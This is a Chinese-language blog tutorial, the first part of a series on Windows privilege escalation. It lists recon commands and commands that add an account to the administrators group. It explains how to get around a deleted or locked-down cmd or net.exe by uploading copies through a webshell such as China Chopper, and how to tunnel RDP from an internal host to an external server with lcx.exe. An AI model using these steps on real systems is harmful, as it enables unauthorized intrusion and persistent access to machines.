提权学习(一) 提权基础及相关的问题的解决

作者:yzc    发布于:

提权

0x01 Windows 常规命令(提权常用)

1 查看 IP 地址配置信息
ipconfig
2 用户操作命令(net user)

(1) 添加用户并设置密码

net user 用户名 用户密码 /add

(2) 删除用户

net user 用户 /del

(3) 添加用户到管理员组

net localgroup administrators 用户 /add
3 网络连接情况命令(netstat)
  • 查看网络连接端口等信息

    netstat -ano
    
4 查看当前计算机进程
tasklist /svc
5 查看当前计算机开启服务名称
net start
6 查看计算机信息以及补丁情况
systeminfo
7 查看当前用户权限
whoami
8 查看当前计算机操作系统版本
ver

0x02 提权中遇到的问题:

1.cmd无法执行

原因:(cmd被降权、cmd被删除、组件被删除、防护软件拦截)

  • 1 cmd被降权、cmd被删除

1

解决方法:

寻找可读可写目录,重新上传cmd,并调用此cmd执行(cmd被降权、cmd被删除)
注意:尽量不选择带空格的目录
  • 2 组件被删除

2

解决方法:

换用其他组件
2.用户无法添加(在权限已经足够添加用户的条件下)

原因:net被删除、防护软件拦截

解决方法:

寻找可读可写目录,重新上传net.exe,并调用此net.exe(net被删除)
3.3389无法连接

原因:

(1) 远程访问的服务端口设置的不是3389

解决方法:

  • 1 PID 查询法

    1' 先执行 `tasklist /svc` 命令查看计算机服务进程以及对应的 PID 号(远程访问服务的名称:TermService)
    
    2' 之后执行 `netstat -ano` 查找 PID 对应的端口信息即为被修改过得远程访问服务端口
    
  • 2 注册表读取法

    在 WebShell 中有可以直接读取对应端口注册表的选项
    
  • 3 端口扫描法

(2) 远程访问的服务没有开启

解决方法:

尝试打开 3389 端口,开启服务(必须是管理员权限)(有工具可以打开)

(3) 内网环境

解决方法:需要用到端口转发,需要准备一台外网服务器以及端口转发工具,外网不能访问内网,但是内网可以访问外网,所以思路就是:让内网将自己3389端口(可能被修改过)的流量转发至外网的一个端口

内网服务器

lcx.exe -slave `外网服务器IP` `端口号1` `内网服务器IP` `远程访问服务的端口号`

该命令是指将内网服务器3389端口(可能被修改过)流量转发至外网服务器的指定端口号1端口

外网服务器

lcx.exe -listen `端口号1` `端口号2`

该命令是指监听本机的端口号1的流量并将该流量转发至端口号2端口

这样主要在本机连接本地的端口号2端口,就相当于访问了内网服务器的3389端口

(4) 防护软件拦截

0x03 在菜刀中提权

如果使用菜刀提权,而目标机器又限制了cmd的命令执行,这时需要寻找可能的可读写目录,上传自己的cmd,之后再虚拟终端执行以下命令修改设置终端路径

setp 上传的 cmd 的路径

0x04 注意事项

(1) 提权可以使用不同的平台进行,如:菜刀、aspx大马

(2) 不同的脚本权限不一样

jsp > aspx > php | asp

(3) 在 aspx 脚本中,如果提权不成功,可试着尝试将 cmd 路径换成 exp 路径,将 exp 路径 + 命令换成 空格 + 命令

format_list_numbered

(无)

  1. 1. 提权
    1. 1.1. 0x01 Windows 常规命令(提权常用)
      1. 1.1.1. 1 查看 IP 地址配置信息
      2. 1.1.2. 2 用户操作命令(net user)
      3. 1.1.3. 3 网络连接情况命令(netstat)
      4. 1.1.4. 4 查看当前计算机进程
      5. 1.1.5. 5 查看当前计算机开启服务名称
      6. 1.1.6. 6 查看计算机信息以及补丁情况
      7. 1.1.7. 7 查看当前用户权限
      8. 1.1.8. 8 查看当前计算机操作系统版本
    2. 1.2. 0x02 提权中遇到的问题:
      1. 1.2.1. 1.cmd无法执行
      2. 1.2.2. 2.用户无法添加(在权限已经足够添加用户的条件下)
      3. 1.2.3. 3.3389无法连接
    3. 1.3. 0x03 在菜刀中提权
    4. 1.4. 0x04 注意事项
vertical_align_top

Copyright © 2017 yzc's blog

Powered by Hexo & Theme - Vateral